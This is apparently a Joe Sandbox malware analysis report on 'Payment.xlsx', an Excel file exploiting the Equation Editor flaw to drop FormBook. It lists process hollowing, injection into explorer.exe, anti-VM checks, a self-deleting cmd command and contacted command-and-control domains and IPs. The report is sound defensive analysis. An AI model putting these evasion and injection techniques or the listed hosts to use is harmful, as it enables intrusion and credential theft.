          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: so[1].exe.2.dr, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp, Binary or memory string: .VBPud<_
          Source: classification engine, Classification label: mal100.troj.expl.evad.winXLSX@14/8@7/7
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\Desktop\~$Payment.xlsx
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Temp\CVRF288.tmp
          Source: C:\Users\Public\vbc.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File read: C:\Users\desktop.ini
          Source: C:\Users\Public\vbc.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe, File read: C:\Windows\System32\drivers\etc\hosts
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: Select * from Clientes WHERE id=@id;;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Payment.xlsx, Virustotal: Detection: 18%
          Source: Payment.xlsx, ReversingLabs: Detection: 10%
          Source: unknown, Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
          Source: unknown, Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe, Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe, Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe, Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe, Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{8856F961-340A-11D0-A96B-00C04FD705A2}\InProcServer32
          Source: Window Recorder, Window detected: More than 3 window changes detected
          Source: C:\Users\Public\vbc.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
          Source: Payment.xlsx, Static file information: File size 1363456 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
          Source: Binary string: napstat.pdb source: vbc.exe, 00000007.00000003.2227630571.00000000007DE000.00000004.00000001.sdmp
          Source: Payment.xlsx, Initial sample: OLE indicators vbamacros = False
          Source: Payment.xlsx, Initial sample: OLE indicators encrypted = True
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_0039C4C8 pushfd ; retn 0030h 4_2_0039C4C9
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_0039C588 push eax; ret 4_2_0039C589
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_007E5748 push eax; retn 007Fh 4_2_007E5751
          Source: C:\Users\Public\vbc.exe, Code function: 4_2_007E6FC8 pushfd ; retf 4_2_007E6FC9
          Source: C:\Users\Public\vbc.exe, Code function: 7_2_00415AFB push eax; iretd 7_2_00415B02
          Source: C:\Users\Public\vbc.exe, Code function: 7_2_0041B3F2 push eax; ret 7_2_0041B3F8
          Source: C:\Users\Public\vbc.exe, Code function: 7_2_0041B3FB push eax; ret 7_2_0041B462
          Source: C:\Users\Public\vbc.exe, Code function: 7_2_0041B3A5 push eax; ret 7_2_0041B3F8
          Source: C:\Users\Public\vbc.exe, Code function: 7_2_0041B45C push eax; ret 7_2_0041B462
          Source: C:\Users\Public\vbc.exe, Code function: 7_2_00414E3F push edx; retf 7_2_00414E4D
          Source: C:\Users\Public\vbc.exe, Code function: 7_2_00415FF0 push es; iretd 7_2_00415FF1
          Source: C:\Users\Public\vbc.exe, Code function: 7_2_00B3DFA1 push ecx; ret 7_2_00B3DFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_01FFDFA1 push ecx; ret 9_2_01FFDFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0009B3A5 push eax; ret 9_2_0009B3F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0009B3FB push eax; ret 9_2_0009B462
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0009B3F2 push eax; ret 9_2_0009B3F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_0009B45C push eax; ret 9_2_0009B462
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_00095AFB push eax; iretd 9_2_00095B02
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_00094E3F push edx; retf 9_2_00094E4D
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE, Code function: 9_2_00095FF0 push es; iretd 9_2_00095FF1
          Source: initial sample, Static PE information: section name: .text entropy: 7.63788106715
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, File created: C:\Users\Public\vbc.exe

          Boot Survival:

          Drops PE files to the user root directory
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: Payment.xlsx Stream path 'EncryptedPackage' entropy: 7.99982132167 (max. 8.0)

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match File source: 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: vbc.exe PID: 2872, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE RDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exe Code function: 7_2_004088A0 rdtsc 7_2_004088A0
          Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2392 Thread sleep time: -300000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2768 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 3000 Thread sleep time: -60000s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2892 Thread sleep time: -102957s >= -30000s
          Source: C:\Users\Public\vbc.exe TID: 2908 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 2028 Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Last function: Thread delayed
          Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 102957
          Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000008.00000000.2182958260.00000000041AD000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000008.00000000.2174877263.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exe Process queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process queried: DebugPort
          Source: C:\Users\Public\vbc.exe Code function: 7_2_00409B10 LdrLoadDll, 7_2_00409B10
          Source: C:\Users\Public\vbc.exe Code function: 7_2_00B426F8 mov eax, dword ptr fs:[00000030h] 7_2_00B426F8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_020026F8 mov eax, dword ptr fs:[00000030h] 9_2_020026F8
          Source: C:\Users\Public\vbc.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process token adjusted: Debug
          Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 54.156.162.121 80
          Source: C:\Windows\explorer.exe Network Connect: 103.5.116.132 80
          Source: C:\Windows\explorer.exe Domain query: www.girlboyfriends.com
          Source: C:\Windows\explorer.exe Network Connect: 66.235.200.147 80
          Source: C:\Windows\explorer.exe Domain query: www.discjockeydelraybeach.com
          Source: C:\Windows\explorer.exe Domain query: www.burundiacademyst.com
          Source: C:\Windows\explorer.exe Network Connect: 157.7.107.165 80
          Source: C:\Windows\explorer.exe Network Connect: 198.54.117.210 80
          Source: C:\Windows\explorer.exe Network Connect: 108.177.174.182 80
          Source: C:\Windows\explorer.exe Domain query: www.donelys.com
          Source: C:\Windows\explorer.exe Domain query: www.arfjkacsgatfzbazpdth.com
          Source: C:\Windows\explorer.exe Domain query: www.pipienta.com
          Injects a PE file into a foreign processes
          Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Thread register set: target process: 1388
          Queues an APC in another process (thread injection)
          Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 310000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\Public\vbc.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000008.00000002.2370907370.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000008.00000000.2175263464.00000000006F0000.00000002.00000001.sdmp Binary or memory string: !Progman
          Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
          |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
          | Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 111 | OS Credential Dumping | Security Software Discovery 321 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
          | Default Accounts | Exploitation for Client Execution 13 | Boot or Logon Initialization Scripts | Extra Window Memory Injection 1 | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Clipboard Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
          | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
          | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 123 | SIM Card Swap | | Carrier Billing Fraud |
          | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | File and Directory Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |
          | Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 41 | Cached Domain Credentials | System Information Discovery 113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features |
          | External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact |
          | Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Extra Window Memory Injection 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue |

          Behavior Graph

          [Behavior graph image. Behavior Graph ID: 404048; Sample: Payment.xlsx; Startdate: 04/05/2021; Architecture: WINDOWS; Score: 100. Process chain shown: EQNEDT32.EXE started vbc.exe, which started further vbc.exe instances; one of these started NAPSTAT.EXE (which started cmd.exe) and injected explorer.exe.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          | Source | Detection | Scanner | Label | Link |
          |---|---|---|---|---|
          | Payment.xlsx | 19% | Virustotal | | Browse |
          | Payment.xlsx | 11% | ReversingLabs | Document-Office.Exploit.CVE-2018-0802 | |

          Dropped Files

          | Source | Detection | Scanner | Label | Link |
          |---|---|---|---|---|
          | C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | | |
          | C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe | 100% | Joe Sandbox ML | | |
          | C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe | 13% | ReversingLabs | Win32.Dropper.Convagent | |
          | C:\Users\Public\vbc.exe | 13% | ReversingLabs | Win32.Dropper.Convagent | |

          Unpacked PE Files

          | Source | Detection | Scanner | Label | Link | Download |
          |---|---|---|---|---|---|
          | 7.2.vbc.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File |

          Domains

          No Antivirus matches

          URLs


Domains and IPs

Contacted Domains


Contacted URLs


URLs from Memory and Binaries

                                                                                                                                      http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://busca.orange.es/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            http://www.target.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://buscador.terra.es/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.iask.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              http://www.tesco.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://search.interpark.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      unknown
                                                                                                                                                      http://investor.msn.com/explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        http://search.espn.go.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              high

Contacted IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.3.122.177 | will.kasraz.com | United States | 36352 | AS-COLOCROSSINGUS | true
54.156.162.121 | cdl-lb-1356093980.us-east-1.elb.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
103.5.116.132 | www.arfjkacsgatfzbazpdth.com | Japan | 17408 | ABOVE-AS-APAboveNetCommunicationsTaiwanTW | true
157.7.107.165 | www.pipienta.com | Japan | 7506 | INTERQGMOInternetIncJP | true
198.54.117.210 | parkingpage.namecheap.com | United States | 22612 | NAMECHEAP-NETUS | false
108.177.174.182 | www.discjockeydelraybeach.com | United States | 395954 | LEASEWEB-USA-LAX-11US | true
66.235.200.147 | burundiacademyst.com | United States | 13335 | CLOUDFLARENETUS | true

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 404048
Start date: 04.05.2021
Start time: 16:57:27
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 13m 26s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Payment.xlsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
